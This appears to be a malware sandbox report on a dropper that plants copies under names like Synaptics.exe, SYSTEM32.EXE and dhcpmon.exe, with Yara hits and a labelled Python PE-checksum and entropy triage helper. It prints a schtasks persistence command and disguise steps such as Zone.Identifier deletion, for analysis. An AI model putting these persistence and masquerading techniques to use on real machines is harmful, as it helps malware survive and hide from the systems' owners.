            Source: ._cache_WINDOWS.EXE.9.dr, #=qWrm21vQ8CBMZP_RBTwpusA==.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
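The static PE findings above (a stored CheckSum of 0x0 against a computed 0x2013d1, a CheckSum of 0x1c288 that should be 0x11595d, and a .text section with entropy 7.9998 and raw size 0x1c8600) can be re-derived without the sandbox. The following Python is an added example, not the report's own code: it parses the PE headers with the standard library only, recomputes the CheckSum the way CheckSumMappedFile does (16-bit sum with end-around carry, the field itself treated as zero, plus the file length) and reports per-section entropy. `build_minimal_pe` constructs a tiny, non-executable PE32 image as demo input in place of the sample, which is not reproduced here. Two readings of the numbers: a stored value of 0 only means the linker never filled the field in, which is the norm for user-mode binaries and is a weak signal by itself; a non-zero stored value that does not match (the ._cache_y8kdmHi6x3.exe case) means the file was modified after the checksum was set, which is the stronger tamper indicator. A .text section near 8.0 bits per byte over 1.8 MB holds compressed or encrypted content rather than code, consistent with a binder stub carrying embedded payloads.

```python
"""Re-check the report's static PE findings (zero CheckSum, near-8.0 .text entropy)
with the Python stdlib only. Added example for this page, not the sandbox's own code."""
import math
import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as CheckSumMappedFile computes it: 16-bit sum with end-around carry
    over the file, the 4-byte CheckSum field treated as zero, plus the file length."""
    total = 0
    for i in range(0, len(data) & ~1, 2):
        if checksum_offset <= i < checksum_offset + 4:
            continue
        total += struct.unpack_from("<H", data, i)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) & 1:  # odd trailing byte counts as a low byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Return (checksum_field_offset, stored_checksum, [(name, vsize, rsize, raw)]).
    PE32 and PE32+ both keep CheckSum at optional-header offset 64."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    checksum_off = opt + 64
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(num_sections):
        name, vsize, _va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + size_opt + i * 40)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rsize, data[rptr:rptr + rsize]))
    return checksum_off, stored, sections


def triage(data: bytes) -> dict:
    """Summarise the same facts the report lists: checksum state and section entropy."""
    checksum_off, stored, sections = parse_pe(data)
    computed = pe_checksum(data, checksum_off)
    out = {
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_unset": stored == 0,                      # linker left it blank: weak signal
        "checksum_mismatch": stored not in (0, computed),   # set, then modified: stronger signal
        "sections": {},
    }
    for name, vsize, rsize, raw in sections:
        ent = shannon_entropy(raw)
        out["sections"][name] = {"virtual_size": vsize, "raw_size": rsize, "entropy": round(ent, 4),
                                 "likely_packed": ent > 7.5 and rsize > 0x100000}  # the report's thresholds
    return out


def build_minimal_pe(text: bytes, checksum: int = 0) -> bytes:
    """Constructed demo input: a minimal PE32 with one .text section. Not a runnable
    program, only enough header for parse_pe and pe_checksum (e_lfanew = 0x40)."""
    file_align = 0x200
    raw_size = -(-len(text) // file_align) * file_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section, 224-byte optional header
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0,
                      raw_size, 0, 0, 0x1000, 0x1000, 0x2000, 0x400000, 0x1000, file_align,
                      6, 0, 0, 0, 6, 0,
                      0, 0x2000, 0x200, checksum,
                      2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * (16 * 8)  # empty data directories
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, raw_size, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + opt + sec
    return headers + b"\0" * (0x200 - len(headers)) + text + b"\0" * (raw_size - len(text))


if __name__ == "__main__":
    demo = build_minimal_pe(bytes(range(256)) * 8)  # uniform bytes: entropy exactly 8.0
    print(triage(demo))
```

For a real file, `triage(open(path, "rb").read())` gives the same three facts the report lists; if `checksum_unset` and `likely_packed` are both true for a 2 MB executable with a single oversized .text, that alone justifies pulling the unpacked copies rather than the file on disk.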

            Persistence and Installation Behavior

            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\AppData\Local\Temp\RCX831F.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\BNAGMGSPLO\~$cache1
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | File created: C:\Users\user\Desktop\WINDOWS.EXE
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe | File created: C:\Users\user\Desktop\SYSTEM32.EXE
            Source: C:\Users\user\Desktop\WINDOWS.EXE | File created: C:\Users\user\Desktop\._cache_WINDOWS.EXE
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\AppData\Local\Temp\RCX788E.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Desktop\._cache_Synaptics.exe

            Boot Survival

            Source: Yara match File source: 15.2.Synaptics.exe.4ebff6c.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46dff6c.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.0.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45fff6c.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cbff6c.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.33.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.27.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.18.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.2.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4c4d1c.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.22.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000007.00000002.558804825.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000024.00000000.426967542.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara match File source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000000.403770740.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000024.00000002.442628618.0000000000842000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
            Source: Yara match File source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.413670718.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 0000001C.00000002.425456929.0000000000862000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match File source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000000.327639082.0000000000DA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara match File source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000000.395835615.0000000000382000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara match File source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara match File source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE File opened: C:\Users\user\Desktop\._cache_WINDOWS.EXE:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,4_2_00459934
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,4_2_0045A054
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,4_2_0045A104
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,4_2_0042C6FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0044083C IsIconic,GetCapture,4_2_0044083C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,4_2_0045695C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,4_2_004410F0
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,9_2_00459934
